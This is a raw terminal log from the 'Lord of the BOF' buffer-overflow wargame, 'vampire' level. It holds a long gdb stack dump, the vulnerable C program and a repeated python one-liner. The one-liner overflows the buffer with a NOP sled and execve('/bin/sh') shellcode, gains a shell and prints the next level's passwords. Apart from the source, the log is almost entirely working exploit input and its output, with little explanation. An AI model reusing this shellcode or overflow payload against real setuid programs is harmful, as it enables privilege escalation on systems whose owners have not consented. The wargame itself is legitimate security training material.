0xbfffeab0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeac0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffead0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeae0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeaf0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeb00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeb10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeb20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeb30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeb40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeb50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeb60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeb70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeb80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeb90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeba0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffebb0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffebc0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffebd0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffebe0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffebf0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffec00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffec10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffec20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffec30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffec40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffec50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffec60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffec70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffec80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffec90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeca0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffecb0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffecc0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffecd0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffece0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffecf0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffed00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffed10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffed20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffed30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffed40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffed50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffed60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffed70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffed80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffed90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeda0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffedb0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffedc0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffedd0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffede0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffedf0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffee00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffee10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffee20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffee30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffee40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffee50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffee60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffee70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffee80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffee90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeea0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeeb0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeec0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbfffeed0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeee0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeef0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffef00: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffef10: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffef20: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffef30: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffef40: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffef50: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffef60: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffef70: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffef80: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffef90: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffefa0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffefb0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffefc0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffefd0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffefe0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbfffeff0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff000: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff010: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff020: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff030: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff040: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff050: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbffff060: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff070: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff080: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff090: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff0a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff0b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff0c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff0d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff0e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff0f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff100: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff110: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff120: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff130: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff140: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff150: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff160: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff170: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff180: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff190: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff1a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff1b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff1c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff1d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff1e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) 
0xbffff1f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff200: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff210: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff220: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff230: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff240: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff250: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff260: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff270: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff280: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff290: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff2a0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff2b0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff2c0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff2d0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff2e0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff2f0: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff300: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff310: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff320: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff330: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff340: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff350: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff360: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
0xbffff370: 0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf  0xbfbfbfbf
(gdb) q
[troll@localhost troll]$ bash2
[troll@localhost troll]$ .
bash2: .: filename argument required
.: usage: . filename
[troll@localhost troll]$ cat vampire.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - vampire
        - check 0xbfff
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
  char buffer[40];

  if(argc < 2){
    printf("argv error\n");
    exit(0);
  }

  if(argv[1][47] != '\xbf')
  {
    printf("stack is still your friend.\n");
    exit(0);
  }

        // here is changed!
        if(argv[1][46] == '\xff')
        {
                printf("but it's not forever\n");
                exit(0);
        }

  strcpy(buffer, argv[1]); 
  printf("%s\n", buffer);
}
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*44+"\xff\xff\xfe\xbf"+"\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿ÿÿþ¿1￐h//shh/bin⏓ኂ°
                                                               ̀ 
bash$ exit
exit
[troll@localhost troll]$ ./vampipe `python -c 'print "\xbf"*44+"\xff\xff\xfe\xbf"+"\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿ÿÿþ¿1￐h//shh/bin⏓ኂ°
                                                               ̀ 
bash$ my-pass
euid = 508
aspirin
bash$ exit
exit
[troll@localhost troll]$ afdasdfsf./vampipe `python -c 'print "\xbf"*44+"\xff\xff\xfe\xbf"+"\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'` 
bash2: afdasdfsf./vampipe: No such file or directory
[troll@localhost troll]$ ./vampire `python -c 'print "\xbf"*44+"\xff\xff\xfe\xbf"+"\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿ÿÿþ¿1￐h//shh/bin⏓ኂ°
                                                               ̀ 
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ my-pass
euid = 509
music world
bash$ exit
exita
[troll@localhost troll]$    